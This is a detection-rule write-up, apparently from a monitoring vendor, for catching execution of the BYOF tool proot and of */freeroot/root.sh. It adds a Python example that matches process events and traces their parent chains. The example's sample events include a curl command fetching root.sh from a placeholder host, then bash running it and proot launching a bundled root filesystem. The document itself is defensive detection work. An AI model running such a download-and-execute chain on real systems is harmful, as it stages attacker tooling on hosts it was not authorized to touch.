Bring your own file system (BYOF) tool executed


What happened

A Bring Your Own Filesystem (BYOF) tool was executed, which attackers can abuse to download and access additional utilities.

Goal

Detect execution of the BYOF tool proot, which attackers may use to download and access additional malicious tools.

Strategy

This rule monitors for execution of the proot binary and detects processes spawned from the path */freeroot/root.sh, a path associated with a bundled file system previously observed in BYOF compromises.

Triage and response

  1. Review the process tree to understand what initiated the proot execution.
  2. Investigate the filesystem and determine if this is authorized activity.
  3. If the activity is unauthorized, isolate the affected system and investigate the initial access point.
  4. Review related signals and events to establish a timeline of the compromise.
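The following is an added example, not part of the original rule or Datadog's own implementation, that models both the Strategy section (matching proot execution and processes spawned from */freeroot/root.sh) and triage step 1 (walking the process tree back from the hit). The process events, pids and paths are constructed for illustration; the `fnmatch` glob treats the rule's `*/freeroot/root.sh` pattern the way a path prefix wildcard would, and "spawned from the path" is simplified to "the executable or its first argument is that script".

```python
import fnmatch
import os

# Constructed sample process-execution events (not real telemetry).
# pids, ppids and paths are hypothetical; the chain models a shell
# session that fetches root.sh, runs it, and the script launching proot.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "exe": "/usr/sbin/sshd",       "argv": ["sshd: deploy [priv]"]},
    {"pid": 230, "ppid": 100, "exe": "/bin/bash",            "argv": ["bash"]},
    {"pid": 231, "ppid": 230, "exe": "/usr/bin/curl",
     "argv": ["curl", "-o", "/tmp/freeroot/root.sh", "http://example.invalid/root.sh"]},
    {"pid": 232, "ppid": 230, "exe": "/bin/bash",            "argv": ["bash", "/tmp/freeroot/root.sh"]},
    {"pid": 233, "ppid": 232, "exe": "/tmp/freeroot/proot",
     "argv": ["proot", "-r", "/tmp/freeroot/rootfs", "/bin/sh"]},
    {"pid": 300, "ppid": 1,   "exe": "/usr/bin/python3",     "argv": ["python3", "app.py"]},
]

PROOT_BINARY = "proot"              # binary name the rule watches for
BYOF_SCRIPT_GLOB = "*/freeroot/root.sh"  # path pattern from the rule's strategy


def is_byof_event(event):
    """Return a reason label if the event matches the rule's strategy, else None."""
    argv = event.get("argv", [])
    # Condition 1: the proot binary itself was executed (by exe path or argv[0]).
    names = [os.path.basename(event["exe"])]
    if argv:
        names.append(os.path.basename(argv[0]))
    if PROOT_BINARY in names:
        return "proot_execution"
    # Condition 2: a process spawned from */freeroot/root.sh, i.e. the script is
    # the executable or the first argument handed to an interpreter.
    # (Simplification: a download tool naming the path as a later argument,
    # like the curl event above, is not "spawned from" it and does not match.)
    candidates = [event["exe"]]
    if len(argv) > 1:
        candidates.append(argv[1])
    if any(fnmatch.fnmatchcase(c, BYOF_SCRIPT_GLOB) for c in candidates):
        return "freeroot_root_sh"
    return None


def ancestry(events, pid):
    """Walk ppid links from pid toward the root; return the chain ordered root -> pid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against cyclic data
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def detect(events):
    """Return [(reason, [exe path of each ancestor, ending at the hit]), ...]."""
    hits = []
    for e in events:
        reason = is_byof_event(e)
        if reason:
            hits.append((reason, [a["exe"] for a in ancestry(events, e["pid"])]))
    return hits


if __name__ == "__main__":
    for reason, chain in detect(SAMPLE_EVENTS):
        print(f"{reason}: {' -> '.join(chain)}")
```

Running the block prints two hits: the interpreter invoked on root.sh, and the proot launch beneath it, each with its parent chain back to sshd, which is the view triage step 1 asks for before deciding whether the activity is authorized.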

Requires Agent version 7.27 or greater.